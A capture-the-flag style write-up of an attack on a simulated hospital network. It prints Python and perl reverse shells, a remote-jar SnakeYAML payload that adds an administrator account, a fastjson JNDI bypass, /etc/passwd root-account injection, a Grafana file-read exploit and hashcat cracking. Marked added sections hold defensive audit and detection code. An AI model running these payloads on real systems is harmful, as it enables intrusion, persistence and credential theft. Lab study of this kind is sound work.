[[Simulation Target - Hospital]]#
Overview#
In this scenario you play a penetration tester sent to test the network security of a hospital. The goal is to gain access to every server so the hospital's network security posture can be assessed. There are 4 flags in total, spread across the different target machines.
Target Architecture
Information Gathering#
The fscan scan yields the following: port 8080 hosts a website and exposes a Spring Boot Actuator heapdump file, so browse to the /actuator directory to list the exposed endpoints and download the heapdump:
http://39.99.225.90:8080/actuator
Visit the website and log in to the backend with weak credentials.
Vulnerability Exploitation#
After logging into the backend, Shiro is detected (the application sets a rememberMe cookie).
The key cannot be brute-forced from the usual key lists, but the heapdump downloaded earlier contains it:
algMode = CBC, key = GAYysgMQhG7/CzIJlVpR2g==, algName = AES
Brute-force the gadget chain
Execute commands
Generate a memory shell and connect to it with Ant Sword
Privilege Escalation#
Look for files with the SUID bit set (find / -perm -4000 -type f 2>/dev/null); vim.basic is SUID, so it can edit any file as root.
Get a reverse shell from Ant Sword to the cloud server:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'
Then upgrade it to an interactive terminal:
python3 -c "import pty;pty.spawn('/bin/bash')"
script /dev/null -c bash
ctrl+z
stty raw -echo; fg
reset
export TERM=xterm-256color
Escalate by editing /etc/passwd with vim.basic. First generate a password hash:
openssl passwd -1 -salt 123 123456
Then append a UID 0 account to /etc/passwd (seven colon-separated fields; the empty field is the GECOS comment):
hacker:$1$123$7mft0jKnzzvAdU4t0unTG1:0:0::/root:/bin/bash
flag01#
After adding it, switch to the new account with su. This server is web01, and it holds flag01.
su hacker
Reference: https://cloud.tencent.com/developer/article/1711865
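The defender's view of the persistence trick above, as an added example (not from the write-up): a small audit over a constructed /etc/passwd sample that contains a copy of the injected hacker line (with all seven fields) and flags what a SUID-editor escalation leaves behind: extra UID-0 accounts, a hash stored inline instead of the x shadow marker, empty password fields, and lines that do not parse as passwd(5). Sample content and account names are constructed.

```python
import re

# Constructed sample: normal entries, the UID-0 account injected in the
# write-up (seven fields), and a deliberately short line.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
hacker:$1$123$7mft0jKnzzvAdU4t0unTG1:0:0::/root:/bin/bash
broken:x:1001:1001:/home/broken:/bin/bash
"""

# passwd(5) has exactly seven colon-separated fields.
FIELDS = ("user", "pw", "uid", "gid", "gecos", "home", "shell")
# crypt(3) prefixes: md5crypt, bcrypt, sha256crypt, sha512crypt, yescrypt
CRYPT_HASH = re.compile(r"^\$(1|2[aby]?|5|6|y)\$")
# values meaning "hash lives in /etc/shadow" or "account locked"
SHADOW_OR_LOCKED = {"x", "*", "!", "!!"}


def parse_passwd(text):
    """Return (entries, malformed): entries as dicts with int uid/gid,
    malformed as (line number, raw line) for lines not matching passwd(5)."""
    entries, malformed = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        parts = line.split(":")
        if len(parts) != 7 or not parts[2].isdigit() or not parts[3].isdigit():
            malformed.append((lineno, line))
            continue
        entry = dict(zip(FIELDS, parts))
        entry["uid"], entry["gid"] = int(parts[2]), int(parts[3])
        entries.append(entry)
    return entries, malformed


def audit_passwd(text):
    """Findings as (check, subject) tuples, in file order."""
    entries, malformed = parse_passwd(text)
    findings = []
    for e in entries:
        if e["uid"] == 0 and e["user"] != "root":
            findings.append(("extra-uid0", e["user"]))
        if e["pw"] == "":
            findings.append(("empty-password", e["user"]))
        elif e["pw"] not in SHADOW_OR_LOCKED:
            # a hash here is world-readable and bypasses /etc/shadow entirely
            kind = "inline-hash" if CRYPT_HASH.match(e["pw"]) else "odd-password-field"
            findings.append((kind, e["user"]))
    for lineno, line in malformed:
        findings.append(("malformed", "line %d: %s" % (lineno, line.split(":")[0])))
    return findings
```

Run it against the real file with `audit_passwd(open("/etc/passwd").read())`; on a clean host the result is empty.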
Internal Network Scanning#
Run fscan for scanning
172.30.12.236:8080 open
172.30.12.5:8080 open
172.30.12.6:445 open
172.30.12.6:139 open
172.30.12.6:135 open
172.30.12.236:22 open
172.30.12.5:22 open
172.30.12.236:8009 open
172.30.12.6:8848 open
[*] NetInfo
[*]172.30.12.6
[->]Server02
[->]172.30.12.6
[*] NetBios 172.30.12.6 WORKGROUP\SERVER02
[*] WebTitle http://172.30.12.5:8080 code:302 len:0 title:None Redirect URL: http://172.30.12.5:8080/login;jsessionid=AA88B536A2B3199D4BB9686F35367F34
[*] WebTitle http://172.30.12.5:8080/login;jsessionid=AA88B536A2B3199D4BB9686F35367F34 code:200 len:2005 title:Medical Management Backend
[*] WebTitle http://172.30.12.6:8848 code:404 len:431 title:HTTP Status 404 – Not Found
[*] WebTitle http://172.30.12.236:8080 code:200 len:3964 title:Hospital Backend Management Platform
[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos
[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos-v1-auth-bypass
[+] PocScan http://172.30.12.5:8080 poc-yaml-spring-actuator-heapdump-file
Two assets of interest were discovered:
http://172.30.12.6:8848 poc-yaml-alibaba-nacos poc-yaml-alibaba-nacos-v1-auth-bypass
http://172.30.12.236:8080 code:200 len:3964 title:Hospital Backend Management Platform
172.30.12.6 on the internal network runs a Nacos service with the default credentials nacos/nacos.
http://172.30.12.236:8080
runs an application that uses fastjson.
flag02#
Use venom to tunnel into the internal network: admin listens on the VPS port, and the agent on web01 connects back to it:
./admin_macos_x64 -lport 9999
./agent_linux_x64 -rhost x.x.x.x(vps ip) -rport 9999
Access the nacos application
http://172.30.12.6:8848/nacos/
Read the configuration stored in Nacos, which leaks the database credentials:
datasource:
mysql:
url: jdbc:mysql://localhost:3306/test?useSSL=false&serverTimezone=UTC&allowPublicKeyRetrieval=true
username: root
password: P@ssWord!!!
In the rollback history of db-config there is a malicious configuration that loads a jar package; its content is roughly as below. At first it looked as though the configuration had to be rolled back to that version, but after resetting the environment several times it turned out that no rollback is needed: the following configuration can be written manually. SnakeYAML instantiates the tagged classes, so a ScriptEngineManager built from a URLClassLoader fetches the jar and loads the script engine factory it declares via SPI:
!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://172.30.12.5:802/yaml-payload.jar"]
]]
]
Use tooling to exploit it.
The malicious payload has to be compiled; reference project: https://github.com/artsploit/yaml-payload
Only the contents of AwesomeScriptEngineFactory.java need changing. Since the target is a Windows machine, the constructor adds an account; the target also has port 3389 open.
public AwesomeScriptEngineFactory() {
try {
Runtime.getRuntime().exec("net user lca Lca@123 /add");
Runtime.getRuntime().exec("net localgroup administrators lca /add");
} catch (IOException e) {
e.printStackTrace();
}
}
Then compile it with Java 1.8. It must be compiled with Java 1.8, otherwise the class file version can be newer than the target JVM supports:
javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .
Upload the jar to web01 (the server with flag01) and serve it from there with a Python web server on port 802, the port used in the payload URL (python3 -m http.server 802), so that web02 (172.30.12.6) can download it. Then send the request with the tool NacosExploitGUI_v3.9, giving as the jar path the URL served by the Python web server:
java -jar NacosExploitGUI_v3.9.jar
When web01's web server logs the request, 172.30.12.6 has downloaded the malicious payload. Next, verify that the account was added.
Configure a proxy on the local computer with Proxifier and connect to port 3389.
The connection succeeds; obtain flag02. This server is web02.
Nacos related vulnerabilities:
Nacos Internal Cluster Raft Deserialization Vulnerability
Nacos JRaft Hessian Deserialization Vulnerability Exploitation Tool
flag03#
Another machine has a fastjson vulnerability.
To avoid traffic leaving the network, start the JNDI server on 172.30.12.5 (web01). The payload below is the fastjson 1.2.47 autotype bypass: the first entry deserializes a java.lang.Class whose val loads com.sun.rowset.JdbcRowSetImpl into fastjson's type cache, so the second entry's @type lookup skips the autotype blacklist; JdbcRowSetImpl then resolves dataSourceName through JNDI when autoCommit is set. The LDAP host must be reachable from the target itself, so point it at web01's address unless the listener runs on the target:
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://localhost:1389/badNameClass",
"autoCommit":true
}
}
Yakit's lower-level proxy needs to be enabled so the request reaches the internal host.
Obtain flag03, this machine is web03
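Both deserialization payloads used so far (the SnakeYAML `!!` tags pushed through Nacos config in the flag02 section and the fastjson `@type` JSON above) can be caught by the same kind of input check. The following is an added example, not code from the write-up, Nacos or fastjson: it scans constructed copies of the two payloads for global YAML tags, remote jar URLs, `@type` keys, the java.lang.Class/val cache bypass and JNDI URLs. The gadget deny-list is illustrative and far shorter than a real one.

```python
import json
import re

# Constructed copies of the two payloads from this write-up.
SAMPLE_NACOS_YAML = """\
!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://172.30.12.5:802/yaml-payload.jar"]
  ]]
]
"""
SAMPLE_FASTJSON = json.dumps({
    "a": {"@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl"},
    "b": {"@type": "com.sun.rowset.JdbcRowSetImpl",
          "dataSourceName": "ldap://localhost:1389/badNameClass",
          "autoCommit": True},
})

# Illustrative deny-list; a real one is much longer.
GADGET_CLASSES = {
    "javax.script.ScriptEngineManager",
    "java.net.URLClassLoader",
    "com.sun.rowset.JdbcRowSetImpl",
    "org.apache.ibatis.datasource.jndi.JndiDataSourceFactory",
}
YAML_GLOBAL_TAG = re.compile(r"!!([A-Za-z_][\w.$]*)")   # SnakeYAML: !!fully.qualified.Class
REMOTE_JAR = re.compile(r"https?://[^\s\"'\]]+\.jar\b")
JNDI_URL = re.compile(r"\b(?:ldaps?|rmi|iiop)://[^\s\"']+", re.I)


def scan_yaml(text):
    """(check, value, dangerous) for every global tag and remote jar URL."""
    findings = [("yaml-tag", m.group(1), m.group(1) in GADGET_CLASSES)
                for m in YAML_GLOBAL_TAG.finditer(text)]
    findings += [("remote-jar", m.group(0), True) for m in REMOTE_JAR.finditer(text)]
    return findings


def _dicts(node):
    """Depth-first walk yielding every JSON object."""
    if isinstance(node, dict):
        yield node
        for v in node.values():
            yield from _dicts(v)
    elif isinstance(node, list):
        for v in node:
            yield from _dicts(v)


def scan_fastjson(body):
    """(check, value, dangerous) for @type keys, the 1.2.47 cache bypass and JNDI URLs."""
    findings = []
    for obj in _dicts(json.loads(body)):
        t = obj.get("@type")
        if isinstance(t, str):
            findings.append(("autotype", t, t in GADGET_CLASSES))
            val = obj.get("val")
            if t == "java.lang.Class" and isinstance(val, str):
                # fastjson <= 1.2.47: deserializing java.lang.Class loads `val` into
                # the type cache, so a later @type lookup skips the autotype blacklist
                findings.append(("class-cache-bypass", val, val in GADGET_CLASSES))
        for v in obj.values():
            if isinstance(v, str) and JNDI_URL.search(v):
                findings.append(("jndi-url", v, True))
    return findings


def dangerous(findings):
    """Only the findings that should block the input outright."""
    return [f for f in findings if f[2]]
```

A benign document such as `{"name": "alice", "roles": ["user"]}` yields no findings, while either payload above yields three blocking ones; in practice the real fix is to disable SnakeYAML global tags (SafeConstructor) and fastjson autotype rather than to pattern-match, but the scan is useful on logs and WAF samples.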
flag04#
Reaching the last machine from the local computer requires a second layer of internal proxy. This machine runs grafana and postgres; grafana has weak credentials, so the backend can be logged into directly.
The grafana backend can run postgres statements, which gives a low-privileged reverse shell back to the web03 server. The command string is dollar-quoted so the single quotes inside the perl one-liner do not need escaping (a backslash does not escape quotes in a standard SQL string). Note that loading system() straight out of libc only works where the server accepts a library without a PG_MODULE_MAGIC block; PostgreSQL 8.2 and later reject it with "incompatible library", and then a custom extension library is needed.
CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
select system($cmd$perl -e 'use Socket;$i="172.30.54.179";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'$cmd$);
On web03, download https://github.com/A-D-Team/grafanaExp and use its exploit for CVE-2021-43798 (the Grafana plugin path traversal, an arbitrary file read) to read the account password, then log in to the postgres account:
./grafanaExp exp -u http://172.30.54.12:3000/
The password read out is postgres@123; log in with psql:
psql -h 172.30.54.12 -U postgres -W
postgres=# select version();
postgres=# SHOW is_superuser;
The administrator's password hash is stored in md5 format; crack it with hashcat. Note that a PostgreSQL role hash is md5(password || rolname) with the username folded in, which hashcat handles as mode 12 (PostgreSQL); mode 0 is plain MD5 of the password alone. The root database user's password is P@ssw0rd123.
hashcat -w 4 -m 0 -a 0 hashfile.txt /usr/share/wordlists/rockyou.txt -O
Then log in as the root user, calling psql by its absolute path:
sudo /usr/local/postgresql/bin/psql
Type \? to list psql's backslash commands; \! runs a shell command from the psql prompt, and from that shell flag04 can be found.
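The offline side of the cracking step above, as an added example (not from the write-up or from hashcat): PostgreSQL stores a legacy md5 role password as "md5" + hex(md5(password || rolname)), so a candidate has to be combined with the role name before hashing, and SCRAM-SHA-256 rows cannot be checked this way at all. The rows below are constructed to look like `select rolname, rolpassword from pg_authid` output (the hashes are generated locally from the passwords named in this write-up), and the candidate list is a tiny stand-in for rockyou.

```python
import hashlib


def pg_md5(rolname, password):
    """PostgreSQL legacy md5 role hash: 'md5' + hex(md5(password || rolname))."""
    return "md5" + hashlib.md5((password + rolname).encode()).hexdigest()


def classify(stored):
    """'md5', 'scram', 'none' or 'unknown' for a pg_authid.rolpassword value."""
    if stored is None:
        return "none"
    if stored.startswith("SCRAM-SHA-256$"):
        return "scram"
    if stored.startswith("md5") and len(stored) == 35:
        return "md5"
    return "unknown"


def crack_pg_authid(rows, candidates):
    """rows: (rolname, rolpassword) pairs; returns {rolname: password} for the
    md5 rows that matched a candidate. SCRAM rows are salted and iterated and
    are skipped here (hashcat mode 28600 covers them)."""
    cracked = {}
    for rolname, stored in rows:
        if classify(stored) != "md5":
            continue
        for pw in candidates:
            if pg_md5(rolname, pw) == stored:   # username is part of the digest
                cracked[rolname] = pw
                break
    return cracked


# Constructed pg_authid-style rows; the SCRAM value is a truncated placeholder.
SAMPLE_ROWS = [
    ("postgres", pg_md5("postgres", "postgres@123")),
    ("root", pg_md5("root", "P@ssw0rd123")),
    ("grafana", "SCRAM-SHA-256$4096:c2FsdA==$...$..."),
    ("readonly", None),
]
CANDIDATES = ["123456", "password", "postgres@123", "P@ssw0rd123"]
```

Because the role name is hashed in, the same password gives different stored values for postgres and root, which is why a list of bare md5(password) digests will not match pg_authid rows.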